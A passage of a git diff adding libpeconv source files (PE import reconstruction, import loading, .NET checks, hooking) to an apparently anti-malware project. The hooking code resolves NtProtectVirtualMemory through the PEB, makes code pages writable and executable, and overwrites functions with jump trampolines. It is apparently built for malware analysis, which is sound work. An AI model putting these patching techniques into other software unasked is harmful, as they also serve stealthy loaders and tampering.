IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, false); + if (!dotnet_ptr) return false; + + if (peconv::get_dotnet_hdr(pe_buffer, pe_buffer_size, dotnet_ptr)) { + return true; + } + return false; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.h b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.h new file mode 100644 index 0000000..a7386b8 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.h @@ -0,0 +1,8 @@ +#pragma once + +#include + +bool fix_dot_net_ep(BYTE *pe_buffer, size_t pe_buffer_size); +bool is_dot_net(BYTE *pe_buffer, size_t pe_buffer_size); + +BYTE* search_jump(BYTE *buf, size_t buf_size, const DWORD cor_exe_main_thunk, const ULONGLONG img_base); diff --git a/ai_anti_malware/libpeconv/libpeconv/src/fix_imports.cpp b/ai_anti_malware/libpeconv/libpeconv/src/fix_imports.cpp new file mode 100644 index 0000000..230b696 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/fix_imports.cpp @@ -0,0 +1,306 @@ +#include "peconv/fix_imports.h" +#include "peconv/imports_uneraser.h" +#include "peconv/file_util.h" + +#include +#include + +using namespace peconv; + +template +size_t find_addresses_to_fill(FIELD_T call_via, FIELD_T thunk_addr, LPVOID modulePtr, size_t moduleSize, IN const peconv::ExportsMapper& exportsMap, OUT std::set &addresses) +{ + size_t addrCounter = 0; + do { + LPVOID call_via_ptr = (LPVOID)((ULONGLONG)modulePtr + call_via); + if (call_via_ptr == nullptr) break; + + LPVOID thunk_ptr = (LPVOID)((ULONGLONG)modulePtr + thunk_addr); + if (thunk_ptr == nullptr) break; + + if (!validate_ptr(modulePtr, moduleSize, thunk_ptr, sizeof(FIELD_T))) { + break; + } + if (!validate_ptr(modulePtr, moduleSize, call_via_ptr, sizeof(FIELD_T))) { + break; + } + FIELD_T *thunk_val = reinterpret_cast(thunk_ptr); + FIELD_T *call_via_val = reinterpret_cast(call_via_ptr); + if (*call_via_val == 0) { + //nothing to fill, probably the last record + break; + } + + ULONGLONG searchedAddr = ULONGLONG(*call_via_val); + if (exportsMap.find_export_by_va(searchedAddr) != nullptr) { + addresses.insert(searchedAddr); + addrCounter++; + } + //--- + call_via += sizeof(FIELD_T); + thunk_addr += sizeof(FIELD_T); + } while (true); + + return addrCounter; +} + +std::set get_all_dlls_exporting_function(ULONGLONG func_addr, const peconv::ExportsMapper& exportsMap) +{ + std::set currDllNames; + //1. Get all the functions from all accessible DLLs that correspond to this address: + const std::set* exports_for_va = exportsMap.find_exports_by_va(func_addr); + if (!exports_for_va) { + std::cerr << "Cannot find any DLL exporting: " << std::hex << func_addr << std::endl; + return currDllNames; //empty + } + //2. Iterate through their DLL names and add them to a set: + for (std::set::iterator strItr = exports_for_va->begin(); + strItr != exports_for_va->end(); + ++strItr) + { + currDllNames.insert(strItr->libName); + } + return currDllNames; +} + +std::set get_dlls_intersection(const std::set &dllNames, const std::set &currDllNames) +{ + std::set resultSet; + std::set_intersection(dllNames.begin(), dllNames.end(), + currDllNames.begin(), currDllNames.end(), + std::inserter(resultSet, resultSet.begin()) + ); + return resultSet; +} + +//find the name of the DLL that can cover all the addresses of imported functions +std::string find_covering_dll(std::set &addresses, const peconv::ExportsMapper& exportsMap) +{ + std::set mainDllsSet; + std::set reserveDllSet; + bool isFresh = true; + + // the earliest addresses are more significant for the final decision on what DLL to choose + // so, they should be processed at the end + std::set::iterator addrItr; + + for (addrItr = addresses.begin(); addrItr != addresses.end(); ++addrItr) { + ULONGLONG searchedAddr = *addrItr; + //--- + // 1. Find all the DLLs exporting this particular function (can be forwarded etc) + std::set currDllNames = get_all_dlls_exporting_function(searchedAddr, exportsMap); + + //2. Which of those DLLs covers also previous functions from this series? + if (isFresh) { + //if no other function was processed before, set the current DLL set as the total set + mainDllsSet = currDllNames; + isFresh = false; + continue; + } + // find the intersection between the total set and the current set + std::set resultSet = get_dlls_intersection(mainDllsSet, currDllNames); + if (resultSet.size() > 0) { + //found intersection, overwrite the main set + mainDllsSet = resultSet; + continue; + } + // if no intersection found in the main set, check if there is any in the reserved set: + resultSet = get_dlls_intersection(reserveDllSet, currDllNames); + if (resultSet.size() > 0) { + //found intersection, overwrite the main set + reserveDllSet = mainDllsSet; // move the current to the reserve + mainDllsSet = resultSet; + continue; + } + // no intersection found with any of the sets: + reserveDllSet = currDllNames; //set is as a reserved DLL: to be used if it will reoccur + } + if (mainDllsSet.size() > 0) { + const std::string main_dll = *(mainDllsSet.begin()); + return main_dll; + } + return ""; +} + +bool ImportedDllCoverage::findCoveringDll() +{ + std::string found_name = find_covering_dll(this->addresses, this->exportsMap); + if (found_name.length() == 0) { +#ifdef _DEBUG + std::cerr << "Cannot find a covering DLL" << std::endl; +#endif + return false; + } + this->dllName = found_name; +#ifdef _DEBUG + std::cout << "[+] Found DLL name: " << found_name << std::endl; +#endif + return true; +} + +size_t map_addresses_to_functions(std::set &addresses, + IN const std::string &chosenDll, + IN const peconv::ExportsMapper& exportsMap, + OUT std::map> &addr_to_func, + OUT std::set ¬_found +) +{ + std::set coveredAddresses; + std::set::iterator addrItr; + for (addrItr = addresses.begin(); addrItr != addresses.end(); ++addrItr) { + + ULONGLONG searchedAddr = *addrItr; + + const std::set* exports_for_va = exportsMap.find_exports_by_va(searchedAddr); + if (exports_for_va == nullptr) { + not_found.insert(searchedAddr); +#ifdef _DEBUG + std::cerr << "Cannot find any DLL exporting: " << std::hex << searchedAddr << std::endl; +#endif + continue; + } + + for (std::set::iterator strItr = exports_for_va->begin(); + strItr != exports_for_va->end(); + ++strItr) + { + std::string dll_name = strItr->libName; + if (dll_name != chosenDll) { + continue; + } + ExportedFunc func = *strItr; + addr_to_func[searchedAddr].insert(func); + coveredAddresses.insert(searchedAddr); + } + if (addr_to_func.find(searchedAddr) == addr_to_func.end()) { + const ExportedFunc* func = exportsMap.find_export_by_va(searchedAddr); + not_found.insert(searchedAddr); +#ifdef _DEBUG + std::cerr << "[WARNING] A function: " << func->toString() << " not found in the covering DLL: " << chosenDll << std::endl; +#endif + } + } + return coveredAddresses.size(); +} + +size_t ImportedDllCoverage::mapAddressesToFunctions(const std::string &dll) +{ + //reset all stored info: + this->mappedDllName = dll; + if (this->addrToFunc.size() > 0) { + this->addrToFunc.clear(); + } + this->notFound.clear(); + + const size_t coveredCount = map_addresses_to_functions(this->addresses, dll, this->exportsMap, this->addrToFunc, this->notFound); +#ifdef _DEBUG + if (notFound.size()) { + std::cout << "[-] Not all addresses are covered! Not found: " << std::dec << notFound.size() << std::endl; + } else { + + std::cout << "All covered!" << std::endl; + } +#endif + return coveredCount; +} + +void ImpsNotCovered::insert(ULONGLONG thunk, ULONGLONG searchedAddr) +{ +#ifdef _DEBUG + std::cerr << "[-] Function not recovered: [" << std::hex << searchedAddr << "] " << std::endl; +#endif + thunkToAddr[thunk] = searchedAddr; +} + + +bool peconv::fix_imports(IN OUT PVOID modulePtr, IN size_t moduleSize, IN const peconv::ExportsMapper& exportsMap, OUT OPTIONAL peconv::ImpsNotCovered* notCovered) +{ + bool skip_bound = false; // skip boud imports? + IMAGE_DATA_DIRECTORY *importsDir = peconv::get_directory_entry((const BYTE*) modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (importsDir == NULL) { + return true; // done! no imports -> nothing to fix + } + bool is64 = peconv::is64bit((BYTE*)modulePtr); + DWORD maxSize = importsDir->Size; + DWORD impAddr = importsDir->VirtualAddress; + + IMAGE_IMPORT_DESCRIPTOR* lib_desc = NULL; + DWORD parsedSize = 0; +#ifdef _DEBUG + printf("---IMP---\n"); +#endif + + while (parsedSize < maxSize) { + + lib_desc = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + parsedSize + (ULONG_PTR) modulePtr); + if (!validate_ptr(modulePtr, moduleSize, lib_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + printf("[-] Invalid descriptor pointer!\n"); + return false; + } + parsedSize += sizeof(IMAGE_IMPORT_DESCRIPTOR); + if (lib_desc->OriginalFirstThunk == NULL && lib_desc->FirstThunk == NULL) { + break; + } + const bool is_bound = (lib_desc->TimeDateStamp == (-1)); + if (is_bound && skip_bound) { + continue; + } +#ifdef _DEBUG + printf("Imported Lib: %x : %x : %x\n", lib_desc->FirstThunk, lib_desc->OriginalFirstThunk, lib_desc->Name); +#endif + + std::string lib_name = ""; + if (lib_desc->Name != 0) { + LPSTR name_ptr = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + if (validate_ptr(modulePtr, moduleSize, name_ptr, sizeof(char) * MIN_DLL_LEN)) { + lib_name = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + } + } + + DWORD call_via = lib_desc->FirstThunk; + DWORD thunk_addr = lib_desc->OriginalFirstThunk; // warning: it can be NULL! + std::set addresses; + if (!is64) { + find_addresses_to_fill(call_via, thunk_addr, modulePtr, moduleSize, exportsMap, addresses); + } else { + find_addresses_to_fill(call_via, thunk_addr, modulePtr, moduleSize, exportsMap, addresses); + } + ImportedDllCoverage dllCoverage(addresses, exportsMap); + bool is_all_covered = dllCoverage.findCoveringDll(); + bool is_lib_erased = false; + + lib_name = get_dll_shortname(lib_name); //without extension + + if (lib_name.length() == 0) { + is_lib_erased = true; + if (is_all_covered) { + // set a name of the covering DLL: + lib_name = dllCoverage.dllName; + } + } + if (lib_name.length() == 0) { + //could not find a relevant DLL + continue; + } +#ifdef _DEBUG + std::cout << lib_name << std::endl; +#endif + if (!dllCoverage.mapAddressesToFunctions(lib_name)) { + // cannot find any functions imported from this DLL + continue; + } + //everything mapped, now recover it: + ImportsUneraser impUneraser(modulePtr, moduleSize); + if (!impUneraser.uneraseDllImports(lib_desc, dllCoverage, notCovered)) { + return false; + } + if (is_lib_erased) { + const std::string dll_with_ext = exportsMap.get_dll_fullname(dllCoverage.dllName); + impUneraser.uneraseDllName(lib_desc, dll_with_ext); + } + } +#ifdef _DEBUG + std::cout << "---------" << std::endl; +#endif + return true; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/function_resolver.cpp b/ai_anti_malware/libpeconv/libpeconv/src/function_resolver.cpp new file mode 100644 index 0000000..93b9fa3 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/function_resolver.cpp @@ -0,0 +1,18 @@ +#include "peconv/function_resolver.h" + +#include + +FARPROC peconv::default_func_resolver::resolve_func(LPSTR lib_name, LPSTR func_name) +{ + HMODULE libBasePtr = LoadLibraryA(lib_name); + if (libBasePtr == NULL) { + std::cerr << "Could not load the library!" << std::endl; + return NULL; + } + FARPROC hProc = GetProcAddress(libBasePtr, func_name); + if (hProc == NULL) { + std::cerr << "Could not load the function!" << std::endl; + return NULL; + } + return hProc; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/hooks.cpp b/ai_anti_malware/libpeconv/libpeconv/src/hooks.cpp new file mode 100644 index 0000000..831920c --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/hooks.cpp @@ -0,0 +1,224 @@ +#include "peconv/hooks.h" +#include "peconv.h" +#include "peconv/peb_lookup.h" + +using namespace peconv; + +namespace peconv { + + bool is_pointer_in_ntdll(LPVOID lpAddress) + { + HMODULE mod = peconv::get_module_via_peb((LPWSTR)L"ntdll.dll"); + size_t module_size = peconv::get_module_size_via_peb(mod); + if (peconv::validate_ptr(mod, module_size, lpAddress, sizeof(BYTE))) { + return true; //this address lies within NTDLL + } + return false; + } + + BOOL nt_protect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect) + { + FARPROC proc = peconv::get_exported_func( + peconv::get_module_via_peb((LPWSTR)L"ntdll.dll"), + (LPSTR)"NtProtectVirtualMemory" + ); + if (!proc) { + return FALSE; + } + NTSTATUS(NTAPI *_NtProtectVirtualMemory)( + IN HANDLE, + IN OUT PVOID*, + IN OUT PSIZE_T, + IN DWORD, + OUT PDWORD) = + (NTSTATUS(NTAPI *)( + IN HANDLE, + IN OUT PVOID*, + IN OUT PSIZE_T, + IN DWORD, + OUT PDWORD)) proc; + + SIZE_T protect_size = dwSize; + NTSTATUS status = _NtProtectVirtualMemory(GetCurrentProcess(), &lpAddress, &protect_size, flNewProtect, lpflOldProtect); + if (status != S_OK) { + return FALSE; + } + return TRUE; + } +}; + +bool PatchBackup::makeBackup(BYTE *patch_ptr, size_t patch_size) +{ + if (!patch_ptr) { + return false; + } + deleteBackup(); + this->sourcePtr = patch_ptr; + this->buffer = new BYTE[patch_size]; + this->bufferSize = patch_size; + + memcpy(buffer, patch_ptr, patch_size); + return true; +} + +bool PatchBackup::applyBackup() +{ + if (!isBackup()) { + return false; + } + DWORD oldProtect = 0; + if (!nt_protect((LPVOID)sourcePtr, bufferSize, PAGE_EXECUTE_READWRITE, &oldProtect)) { + return false; + } + memcpy(sourcePtr, buffer, bufferSize); + nt_protect((LPVOID)sourcePtr, bufferSize, oldProtect, &oldProtect); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), sourcePtr, bufferSize); + return true; +} + +FARPROC peconv::hooking_func_resolver::resolve_func(LPSTR lib_name, LPSTR func_name) +{ + //the name may be ordinal rather than string, so check if it is a valid pointer: + if (!IsBadReadPtr(func_name, 1)) { + std::map::iterator itr = hooks_map.find(func_name); + if (itr != hooks_map.end()) { + FARPROC hook = itr->second; +#ifdef _DEBUG + std::cout << ">>>>>>Replacing: " << func_name << " by: " << hook << std::endl; +#endif + return hook; + } + } + return peconv::default_func_resolver::resolve_func(lib_name, func_name); +} + +size_t peconv::redirect_to_local64(void *ptr, ULONGLONG new_offset, PatchBackup* backup) +{ + if (!ptr) return 0; + + BYTE hook_64[] = { + 0x48, 0xB8, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xEE, 0xFF, //movabs rax,FFEE998877665544 + 0xFF, 0xE0 //jmp rax + }; + const size_t hook64_size = sizeof(hook_64); + if (is_pointer_in_ntdll(ptr)) { + std::cout << "[WARNING] Patching NTDLL is not allowed because of possible stability issues!\n"; + return 0; + } + DWORD oldProtect = 0; + if (!nt_protect((LPVOID)ptr, + hook64_size, + PAGE_EXECUTE_READWRITE, //this must be executable if we are hooking kernel32.dll, because we are using VirtualProtect from kernel32 at the same time + &oldProtect)) + { + return 0; + } + + if (backup != nullptr) { + backup->makeBackup((BYTE*)ptr, hook64_size); + } + memcpy(hook_64 + 2, &new_offset, sizeof(ULONGLONG)); + memcpy(ptr, hook_64, hook64_size); + + nt_protect((LPVOID)ptr, hook64_size, oldProtect, &oldProtect); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), ptr, hook64_size); + return hook64_size; +} + +size_t peconv::redirect_to_local32(void *ptr, DWORD new_offset, PatchBackup* backup) +{ + if (!ptr) return 0; + + BYTE hook_32[] = { + 0xB8, 0xCC, 0xDD, 0xEE, 0xFF, // mov eax,FFEEDDCC + 0xFF, 0xE0 //jmp eax + }; + const size_t hook32_size = sizeof(hook_32); + if (is_pointer_in_ntdll(ptr)) { + std::cout << "[WARNING] Patching NTDLL is not allowed because of possible stability issues!\n"; + return 0; + } + DWORD oldProtect = 0; + if (!nt_protect((LPVOID)ptr, + hook32_size, + PAGE_EXECUTE_READWRITE, //this must be executable if we are hooking kernel32.dll, because we are using VirtualProtect from kernel32 at the same time + &oldProtect)) + { + return 0; + } + + if (backup != nullptr) { + backup->makeBackup((BYTE*)ptr, hook32_size); + } + memcpy(hook_32 + 1, &new_offset, sizeof(DWORD)); + memcpy(ptr, hook_32, hook32_size); + + nt_protect((LPVOID)ptr, hook32_size, oldProtect, &oldProtect); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), ptr, hook32_size); + return hook32_size; +} + +size_t peconv::redirect_to_local(void *ptr, void* new_function_ptr, PatchBackup* backup) +{ +#ifdef _WIN64 + return peconv::redirect_to_local64(ptr, (ULONGLONG)new_function_ptr, backup); +#else + return peconv::redirect_to_local32(ptr, (DWORD)new_function_ptr, backup); +#endif +} + +inline long long int get_jmp_delta(ULONGLONG currVA, int instrLen, ULONGLONG destVA) +{ + long long int diff = destVA - (currVA + instrLen); + return diff; +} + +inline bool is_valid_delta(long long int delta) +{ + DWORD first_dw = delta >> sizeof(DWORD) * 8; + if (first_dw == 0) { + return true; + } + const DWORD max_dword = DWORD(-1); + if (first_dw != max_dword) { + return false; + } + DWORD delta_dw = DWORD(delta); + if (delta_dw & 0x80000000) { + return true; + } + //invalid, sign bit is missing + return false; +} + +bool peconv::replace_target(BYTE *patch_ptr, ULONGLONG dest_addr) +{ + typedef enum { + OP_JMP = 0xE9, + OP_CALL_DWORD = 0xE8 + } t_opcode; + + if (patch_ptr[0] == OP_JMP || patch_ptr[0] == OP_CALL_DWORD) { + ULONGLONG delta = get_jmp_delta(ULONGLONG(patch_ptr), 5, dest_addr); + if (!is_valid_delta(delta)) { +#ifdef _DEBUG + std::cout << "Cannot replace the target: too big delta: " << std::hex << delta << std::endl; +#endif + //too big delta, cannot be saved in a DWORD + return false; + } + DWORD delta_dw = DWORD(delta); + memcpy(patch_ptr + 1, &delta_dw, sizeof(DWORD)); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), patch_ptr + 1, sizeof(DWORD)); + return true; + } + return false; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/imports_loader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/imports_loader.cpp new file mode 100644 index 0000000..cabba9c --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/imports_loader.cpp @@ -0,0 +1,254 @@ +#include "peconv/imports_loader.h" + +#include + +using namespace peconv; + +class FillImportThunks : public ImportThunksCallback +{ +public: + FillImportThunks(BYTE* _modulePtr, size_t _moduleSize, t_function_resolver* func_resolver) + : ImportThunksCallback(_modulePtr, _moduleSize), funcResolver(func_resolver) + { + } + + virtual bool processThunks(LPSTR lib_name, ULONG_PTR origFirstThunkPtr, ULONG_PTR firstThunkPtr) + { + if (this->is64b) { + IMAGE_THUNK_DATA64* desc = reinterpret_cast(origFirstThunkPtr); + ULONGLONG* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG64); + } + else { + IMAGE_THUNK_DATA32* desc = reinterpret_cast(origFirstThunkPtr); + DWORD* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG32); + } + } + +protected: + template + bool processThunks_tpl(LPSTR lib_name, T_IMAGE_THUNK_DATA* desc, T_FIELD* call_via, T_FIELD ordinal_flag) + { + if (!this->funcResolver) { + return false; + } + + bool is_by_ord = (desc->u1.Ordinal & ordinal_flag) != 0; + + FARPROC hProc = nullptr; + if (is_by_ord) { + + T_FIELD raw_ordinal = desc->u1.Ordinal & (~ordinal_flag); +#ifdef _DEBUG + std::cout << "raw ordinal: " << std::hex << raw_ordinal << std::endl; +#endif + + //hProc = funcResolver->resolve_func(lib_name, MAKEINTRESOURCEA(raw_ordinal)); + return true; + } + else { + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + desc->u1.AddressOfData); + LPSTR func_name = reinterpret_cast(by_name->Name); +#ifdef _DEBUG + std::cout << "name: " << func_name << std::endl; +#endif + hProc = this->funcResolver->resolve_func(lib_name, func_name); + } + if (!hProc) { +#ifdef _DEBUG + std::cerr << "Could not resolve the function!" << std::endl; +#endif + return false; + } + (*call_via) = reinterpret_cast(hProc); + return true; + } + + //fields: + t_function_resolver* funcResolver; +}; + + +template +bool process_imp_functions_tpl(BYTE* modulePtr, size_t module_size, LPSTR lib_name, DWORD call_via, DWORD thunk_addr, IN ImportThunksCallback *callback) +{ + bool is_ok = true; + + T_FIELD *thunks = (T_FIELD*)((ULONGLONG)modulePtr + thunk_addr); + T_FIELD *callers = (T_FIELD*)((ULONGLONG)modulePtr + call_via); + + for (size_t index = 0; true; index++) { + if (!validate_ptr(modulePtr, module_size, &callers[index], sizeof(T_FIELD))) { + break; + } + if (!validate_ptr(modulePtr, module_size, &thunks[index], sizeof(T_FIELD))) { + break; + } + if (callers[index] == 0) { + //nothing to fill, probably the last record + return true; + } + LPVOID thunk_ptr = &thunks[index]; + T_IMAGE_THUNK_DATA* desc = reinterpret_cast(thunk_ptr); + if (!validate_ptr(modulePtr, module_size, desc, sizeof(T_IMAGE_THUNK_DATA))) { + break; + } + if (desc->u1.Function == NULL) { + break; + } + T_FIELD ordinal_flag = (sizeof(T_FIELD) == sizeof(ULONGLONG)) ? IMAGE_ORDINAL_FLAG64 : IMAGE_ORDINAL_FLAG32; + bool is_by_ord = (desc->u1.Ordinal & ordinal_flag) != 0; + if (!is_by_ord) { + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + desc->u1.AddressOfData); + if (!validate_ptr(modulePtr, module_size, by_name, sizeof(IMAGE_IMPORT_BY_NAME))) { + break; + } + } + //when the callback is called, all the pointers should be already verified + if (!callback->processThunks(lib_name, (ULONG_PTR)&thunks[index], (ULONG_PTR)&callers[index])) { + is_ok = false; + } + } + return is_ok; +} + +//Walk through the table of imported DLLs (starting from the given descriptor) and execute the callback each time when the new record was found +bool process_dlls(BYTE* modulePtr, size_t module_size, IMAGE_IMPORT_DESCRIPTOR *first_desc, IN ImportThunksCallback *callback) +{ + bool isAllFilled = true; +#ifdef _DEBUG + std::cout << "---IMP---" << std::endl; +#endif + const bool is64 = is64bit((BYTE*)modulePtr); + IMAGE_IMPORT_DESCRIPTOR* lib_desc = nullptr; + + for (size_t i = 0; true; i++) { + lib_desc = &first_desc[i]; + if (!validate_ptr(modulePtr, module_size, lib_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + break; + } + if (lib_desc->OriginalFirstThunk == NULL && lib_desc->FirstThunk == NULL) { + break; + } + LPSTR lib_name = (LPSTR)((ULONGLONG)modulePtr + lib_desc->Name); + if (!peconv::is_valid_import_name(modulePtr, module_size, lib_name)) { + //invalid name + return false; + } + DWORD call_via = lib_desc->FirstThunk; + DWORD thunk_addr = lib_desc->OriginalFirstThunk; + if (thunk_addr == NULL) { + thunk_addr = lib_desc->FirstThunk; + } +#ifdef _DEBUG + std::cout << "Imported Lib: " << std::hex << lib_desc->FirstThunk << " : " << std::hex << lib_desc->OriginalFirstThunk << " : " << lib_desc->Name << std::endl; +#endif + size_t all_solved = false; + if (is64) { + all_solved = process_imp_functions_tpl(modulePtr, module_size, lib_name, call_via, thunk_addr, callback); + } + else { + all_solved = process_imp_functions_tpl(modulePtr, module_size, lib_name, call_via, thunk_addr, callback); + } + if (!all_solved) { + isAllFilled = false; + } + } +#ifdef _DEBUG + printf("---------\n"); +#endif + return isAllFilled; +} + +bool peconv::process_import_table(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ImportThunksCallback *callback) +{ + if (moduleSize == 0) { //if not given, try to fetch + moduleSize = peconv::get_image_size((const BYTE*)modulePtr); + } + if (moduleSize == 0) return false; + + IMAGE_DATA_DIRECTORY *importsDir = get_directory_entry((BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (!importsDir) { + return true; //no import table + } + const DWORD impAddr = importsDir->VirtualAddress; + IMAGE_IMPORT_DESCRIPTOR *first_desc = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + (ULONG_PTR)modulePtr); + if (!peconv::validate_ptr(modulePtr, moduleSize, first_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + return false; + } + return process_dlls(modulePtr, moduleSize, first_desc, callback); +} + +bool peconv::load_imports(BYTE* modulePtr, t_function_resolver* func_resolver) +{ + size_t moduleSize = peconv::get_image_size((const BYTE*)modulePtr); + if (moduleSize == 0) return false; + + bool is64 = is64bit((BYTE*)modulePtr); + default_func_resolver default_res; + if (!func_resolver) { + func_resolver = (t_function_resolver*)&default_res; + } + + FillImportThunks callback(modulePtr, moduleSize, func_resolver); + return peconv::process_import_table(modulePtr, moduleSize, &callback); +} + +// A valid name must contain printable characters. Empty name is also acceptable (may have been erased) +bool peconv::is_valid_import_name(const PBYTE modulePtr, const size_t moduleSize, LPSTR lib_name) +{ + while (true) { + if (!peconv::validate_ptr(modulePtr, moduleSize, lib_name, sizeof(char))) { + return false; + } + char next_char = *lib_name; + if (next_char == '\0') break; + + if (next_char <= 0x20 || next_char >= 0x7E) { + return false; + } + lib_name++; + } + return true; +} + +bool peconv::has_valid_import_table(const PBYTE modulePtr, size_t moduleSize) +{ + IMAGE_DATA_DIRECTORY *importsDir = get_directory_entry((BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (importsDir == NULL) return false; + + const DWORD impAddr = importsDir->VirtualAddress; + + IMAGE_IMPORT_DESCRIPTOR* lib_desc = NULL; + DWORD parsedSize = 0; + size_t valid_records = 0; + + while (true) { //size of the import table doesn't matter + lib_desc = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + parsedSize + (ULONG_PTR)modulePtr); + if (!peconv::validate_ptr(modulePtr, moduleSize, lib_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + return false; + } + parsedSize += sizeof(IMAGE_IMPORT_DESCRIPTOR); + + if (lib_desc->OriginalFirstThunk == NULL && lib_desc->FirstThunk == NULL) { + break; + } + LPSTR lib_name = (LPSTR)((ULONGLONG)modulePtr + lib_desc->Name); + if (!is_valid_import_name(modulePtr, moduleSize, lib_name)) return false; + + DWORD call_via = lib_desc->FirstThunk; + DWORD thunk_addr = lib_desc->OriginalFirstThunk; + if (thunk_addr == NULL) thunk_addr = lib_desc->FirstThunk; + + DWORD *thunks = (DWORD*)((ULONGLONG)modulePtr + thunk_addr); + if (!peconv::validate_ptr(modulePtr, moduleSize, thunks, sizeof(DWORD))) return false; + + DWORD *callers = (DWORD*)((ULONGLONG)modulePtr + call_via); + if (!peconv::validate_ptr(modulePtr, moduleSize, callers, sizeof(DWORD))) return false; + + valid_records++; + } + + return (valid_records > 0); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/imports_uneraser.cpp b/ai_anti_malware/libpeconv/libpeconv/src/imports_uneraser.cpp new file mode 100644 index 0000000..e8a9a5a --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/imports_uneraser.cpp @@ -0,0 +1,243 @@ +#include "peconv/imports_uneraser.h" + +#include + +using namespace peconv; + +LPVOID search_name(std::string name, const char* modulePtr, size_t moduleSize) +{ + const char* namec = name.c_str(); + const size_t searched_len = name.length() + 1; // with terminating NULL + const char* found_ptr = std::search(modulePtr, modulePtr + moduleSize, namec, namec + searched_len); + if (found_ptr == NULL) { + return NULL; + } + size_t o = found_ptr - modulePtr; + if (o < moduleSize) { + return (LPVOID)(found_ptr); + } + return NULL; +} + +bool ImportsUneraser::writeFoundDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &found_name) +{ +#ifdef _DEBUG + std::cout << "Found name:" << found_name << std::endl; +#endif + LPSTR name_ptr = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + size_t full_name_len = found_name.length() + 1; // with terminating zero + if (!validate_ptr(modulePtr, moduleSize, name_ptr, full_name_len)) { + //corner case: allow to save the name at the very end of the buffer, without the terminating zero + full_name_len--; + if (!validate_ptr(modulePtr, moduleSize, name_ptr, full_name_len)) { + return false; //invalid pointer, cannot save + } + } + memcpy(name_ptr, found_name.c_str(), full_name_len); + return true; +} + +bool ImportsUneraser::uneraseDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &dll_name) +{ + LPSTR name_ptr = nullptr; + if (lib_desc->Name != 0) { + name_ptr = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + } + if (name_ptr == nullptr || !validate_ptr(modulePtr, moduleSize, name_ptr, sizeof(char) * MIN_DLL_LEN)) { + //try to get the cave: + DWORD cave_size = DWORD(dll_name.length() + 1 + 5); //ending null + padding + PBYTE ptr = find_ending_cave(modulePtr, moduleSize, cave_size); + if (ptr == nullptr) { + std::cerr << "Cannot save the DLL name: " << dll_name << std::endl; + return false; + } + DWORD cave_rva = static_cast(ptr - modulePtr); + lib_desc->Name = cave_rva; + } + + if (writeFoundDllName(lib_desc, dll_name)) { + return true; // written the found name + } + return false; +} + +template +bool ImportsUneraser::findNameInBinaryAndFill(IMAGE_IMPORT_DESCRIPTOR* lib_desc, + LPVOID call_via_ptr, + LPVOID thunk_ptr, + const FIELD_T ordinal_flag, + std::map> &addr_to_func +) +{ + if (call_via_ptr == NULL || modulePtr == NULL || lib_desc == NULL) { + return false; //malformed input + } + IMAGE_DATA_DIRECTORY *importsDir = get_directory_entry((BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (!importsDir) return false; + + const DWORD impAddr = importsDir->VirtualAddress; //start of the import table + + FIELD_T *call_via_val = (FIELD_T*)call_via_ptr; + if (*call_via_val == 0) { + //nothing to fill, probably the last record + return false; + } + ULONGLONG searchedAddr = ULONGLONG(*call_via_val); + bool is_name_saved = false; + + FIELD_T lastOrdinal = 0; //store also ordinal of the matching function + std::set::iterator funcname_itr = addr_to_func[searchedAddr].begin(); + + for (funcname_itr = addr_to_func[searchedAddr].begin(); + funcname_itr != addr_to_func[searchedAddr].end(); + ++funcname_itr) + { + const ExportedFunc &found_func = *funcname_itr; + lastOrdinal = found_func.funcOrdinal; + + const char* names_start = ((const char*) modulePtr + impAddr); + BYTE* found_ptr = (BYTE*) search_name(found_func.funcName, names_start, moduleSize - (names_start - (const char*)modulePtr)); + if (!found_ptr) { + //name not found in the binary + //TODO: maybe it is imported by ordinal? + continue; + } + + const ULONGLONG name_offset = (ULONGLONG)found_ptr - (ULONGLONG)modulePtr; +#ifdef 